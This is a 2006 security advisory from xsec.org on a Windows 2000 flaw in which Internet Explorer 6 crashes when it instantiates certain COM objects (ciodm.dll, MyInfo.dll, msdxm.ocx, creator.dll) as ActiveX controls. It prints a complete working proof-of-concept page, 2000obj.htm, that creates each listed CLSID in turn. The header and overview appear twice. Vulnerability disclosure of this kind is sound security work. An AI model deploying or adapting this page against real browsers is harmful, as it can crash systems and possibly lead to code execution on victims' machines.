Advisory Name:
Windows 2000 Multiple COM Object Instantiation Vulnerability
Release Date:
08/21/2006
Tested on:
Windows 2000/Internet Explorer 6.0 SP1
Affected version:
Windows 2000
Author:
nop <nop#xsec.org>
http://www.xsec.org
Overview:
Multiple vulnerability has been found in Windows 2000, When Internet Explorer tries to instantiate the ciodm.dll, MyInfo.dll,msdxm.ocx,Creator.dll(Media player 9) COM object as an ActiveX control, it may corrupt system memory in such a way that an attacker may DoS and possibly could execute arbitrary code.
XSec-06-08
Advisory Name:
Windows 2000 Multiple COM Object Instantiation Vulnerability
Release Date:
08/21/2006
Tested on:
Windows 2000/Internet Explorer 6.0 SP1
Affected version:
Windows 2000
Author:
nop <nop#xsec.org>
http://www.xsec.org
Overview:
Multiple vulnerability has been found in Windows 2000, When Internet Explorer tries to instantiate the ciodm.dll, MyInfo.dll,msdxm.ocx,Creator.dll(Media player 9) COM object as an ActiveX control, it may corrupt system memory in such a way that an attacker may DoS and possibly could execute arbitrary code.
Exploit:
=============== 2000obj.htm start ================
<!--
// Windows 2000 Multiple COM Object Instantiation Vulnerability
// tested on Windows 2000 SP4 CN
// http://www.xsec.org
// nop (nop#xsec.org)
--!>
<html>
<head>
<title>COM-tester</title>
</head>
</body>
<script>
var i =0;
var clsid = new Array(
// NO: 1
// CLSID: {3BC4F3A3-652A-11D1-B4D4-00C04FC2DB8D}
// Info: Microsoft Index Server Catalog Administration Object
// ProgID: Microsoft.ISCatAdm.1
// InprocServer32: C:\WINNT\system32\ciodm.dll
"{3BC4F3A3-652A-11D1-B4D4-00C04FC2DB8D}",
// NO: 2
// CLSID: {4682C82A-B2FF-11D0-95A8-00A0C92B77A9}
// Info: MyInfo ASP Component// ProgID: MSWC.MyInfo.1
// InprocServer32: C:\WINNT\system32\inetsrv\MyInfo.dll
"{4682C82A-B2FF-11D0-95A8-00A0C92B77A9}",
// NO: 3
// CLSID: {8E71888A-423F-11D2-876E-00A0C9082467}
// Info: RadioServer Class
// ProgID: Mmedia.RadioServer.1
// InprocServer32: C:\WINNT\system32\msdxm.ocx
"{8E71888A-423F-11D2-876E-00A0C9082467}",
// NO: 4 media player?
// CLSID: {606EF130-9852-11D3-97C6-0060084856D4}
// Info: CdCreator Class// ProgID: Creator.CdCreator.1
// InprocServer32: C:\Program Files\Common Files\Adaptec
Shared\CreatorAPI\creator.dll
"{606EF130-9852-11D3-97C6-0060084856D4}",
// NO: 5 media player?
// CLSID: {F849164D-9863-11D3-97C6-0060084856D4}
// Info: CdDevice Class// ProgID: Creator.CdDevice.1
// InprocServer32: C:\Program Files\Common Files\Adaptec
Shared\CreatorAPI\creator.dll
"{F849164D-9863-11D3-97C6-0060084856D4}",
// END
null
);
while(clsid[i])
{
var a = document.createElement("object");
window.status = "Testing Object " + clsid[i] + "...";
a.setAttribute("classid", "clsid:" + clsid[i]);
i++;
}
window.status = "failed!";
</script>
</body>
</html>
=============== 2000obj.htm end ==================
Link:
http://www.xsec.org/index.php?module=Releases&act=view&type=1&id=16
About XSec:
We are redhat.
[ reply ]